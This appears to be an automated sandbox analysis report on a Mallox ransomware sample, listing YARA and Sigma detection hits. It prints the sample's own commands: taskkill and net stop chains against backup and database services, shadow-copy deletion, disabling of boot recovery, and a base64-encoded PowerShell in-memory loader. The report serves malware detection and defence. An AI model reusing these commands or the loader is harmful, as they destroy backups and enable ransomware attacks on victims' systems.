  • 0x1faf8:$s4: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe
  • 0x1fba0:$s5: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe
  • 0x1fc50:$s6: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe
  • 0x1fd00:$s7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
  • 0x1fdb8:$s8: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe
  • 0x1fe70:$s9: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe
  • 0x1ff18:$s10: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
  • 0x1f5ae:$s11: bcdedit /set {current} recoveryenabled no
  • 0x1ee58:$mallox_mallox: .mallox
Process Memory Space: R1TftmQpuQ.bat.exe PID: 5664JoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
    Process Memory Space: R1TftmQpuQ.bat.exe PID: 5664JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      Process Memory Space: R1TftmQpuQ.bat.exe PID: 5664JoeSecurity_TargetedRansomwareYara detected Targeted RansomwareJoe Security
        Process Memory Space: R1TftmQpuQ.bat.exe PID: 5664INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x5a24a4:$b2: ::FromBase64String(
        • 0x2c31a:$s1: -join
        • 0x393ef:$s1: -join
        • 0x3c7c1:$s1: -join
        • 0x3ce73:$s1: -join
        • 0x3e964:$s1: -join
        • 0x40b6a:$s1: -join
        • 0x41391:$s1: -join
        • 0x41c01:$s1: -join
        • 0x4233c:$s1: -join
        • 0x4236e:$s1: -join
        • 0x423b6:$s1: -join
        • 0x423d5:$s1: -join
        • 0x42c25:$s1: -join
        • 0x42da1:$s1: -join
        • 0x42e19:$s1: -join
        • 0x42eac:$s1: -join
        • 0x43112:$s1: -join
        • 0x452a8:$s1: -join
        • 0x53cf2:$s1: -join
        • 0x6943a:$s1: -join
        Click to see the 2 entries
        SourceRuleDescriptionAuthorStrings
        4.2.R1TftmQpuQ.bat.exe.5d12868.2.unpackransomware_malloxRule to detect mallox ransomware samples.Sekoia.io
        • 0x1cbfc:$s1: C:\HOW TO RECOVER !!.TXT
        • 0x1c5c8:$s2: SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
        • 0x1c648:$s3: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe
        • 0x1c6f8:$s4: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe
        • 0x1c7a0:$s5: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe
        • 0x1c850:$s6: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe
        • 0x1c900:$s7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
        • 0x1c9b8:$s8: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe
        • 0x1ca70:$s9: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe
        • 0x1cb18:$s10: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
        • 0x1c1ae:$s11: bcdedit /set {current} recoveryenabled no
        • 0x1ba58:$mallox_mallox: .mallox
        4.2.R1TftmQpuQ.bat.exe.5e5bd78.4.unpackransomware_malloxRule to detect mallox ransomware samples.Sekoia.io
        • 0x1cbfc:$s1: C:\HOW TO RECOVER !!.TXT
        • 0x1c5c8:$s2: SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
        • 0x1c648:$s3: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe
        • 0x1c6f8:$s4: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe
        • 0x1c7a0:$s5: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe
        • 0x1c850:$s6: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe
        • 0x1c900:$s7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
        • 0x1c9b8:$s8: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe
        • 0x1ca70:$s9: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe
        • 0x1cb18:$s10: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
        • 0x1c1ae:$s11: bcdedit /set {current} recoveryenabled no
        • 0x1ba58:$mallox_mallox: .mallox
        10.2.MSBuild.exe.400000.0.unpackransomware_malloxRule to detect mallox ransomware samples.Sekoia.io
        • 0x1e5fc:$s1: C:\HOW TO RECOVER !!.TXT
        • 0x1dfc8:$s2: SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
        • 0x1e048:$s3: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe
        • 0x1e0f8:$s4: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe
        • 0x1e1a0:$s5: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe
        • 0x1e250:$s6: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe
        • 0x1e300:$s7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
        • 0x1e3b8:$s8: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe
        • 0x1e470:$s9: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe
        • 0x1e518:$s10: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
        • 0x1dbae:$s11: bcdedit /set {current} recoveryenabled no
        • 0x1d458:$mallox_mallox: .mallox
        4.2.R1TftmQpuQ.bat.exe.5d12868.2.raw.unpackransomware_malloxRule to detect mallox ransomware samples.Sekoia.io
        • 0x1e5fc:$s1: C:\HOW TO RECOVER !!.TXT
        • 0x1dfc8:$s2: SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
        • 0x1e048:$s3: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe
        • 0x1e0f8:$s4: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe
        • 0x1e1a0:$s5: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe
        • 0x1e250:$s6: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe
        • 0x1e300:$s7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
        • 0x1e3b8:$s8: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe
        • 0x1e470:$s9: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe
        • 0x1e518:$s10: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
        • 0x1dbae:$s11: bcdedit /set {current} recoveryenabled no
        • 0x1d458:$mallox_mallox: .mallox
        10.2.MSBuild.exe.400000.0.raw.unpackransomware_malloxRule to detect mallox ransomware samples.Sekoia.io
        • 0x1fffc:$s1: C:\HOW TO RECOVER !!.TXT
        • 0x1f9c8:$s2: SYSTEM\CurrentControlSet\Services\EventLog\Application\Raccine
        • 0x1fa48:$s3: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe
        • 0x1faf8:$s4: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe
        • 0x1fba0:$s5: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe
        • 0x1fc50:$s6: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe
        • 0x1fd00:$s7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
        • 0x1fdb8:$s8: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe
        • 0x1fe70:$s9: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe
        • 0x1ff18:$s10: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe
        • 0x1f5ae:$s11: bcdedit /set {current} recoveryenabled no
        • 0x1ee58:$mallox_mallox: .mallox
        Click to see the 2 entries

        Operating System Destruction

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe", CommandLine: cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Bwmeldokille
        Source: Process startedAuthor: Joe Security: Data: Command: cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled", CommandLine: cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Bwmeldokiller.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7144, ParentProcessName: cmd.exe, ProcessCommandLine: cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAK4AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCuACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBXAHIAZwB2AGcAcAByACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBCAGkAbgBkAGkAbgBnAEYAbABhAGcAcwBdACAAJwBTAHQAYQB0AGkAYwAsACAAUAB1AGIAbABpAGMALAAgAE4AbwBuAFAAdQBiAGwAaQBjACcAKQA7ACAAJABlAG4AdAByAHkAUABvAGkAbgB0AE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=, CommandLine: "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUA
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet, CommandLine: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet, CommandLine|base64offset|contains: u^, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 6028, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet, ProcessId: 5968, ProcessName: vssadmin.exe
        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.26.13.205, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6028, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49843
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==, CommandLine|base64offset|contains: CB, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAK4AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCuACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBXAHIAZwB2AGcAcAByACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAH
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 6204, TargetFilename: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: net stop "SQLSERVERAGENT" , CommandLine: net stop "SQLSERVERAGENT" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= 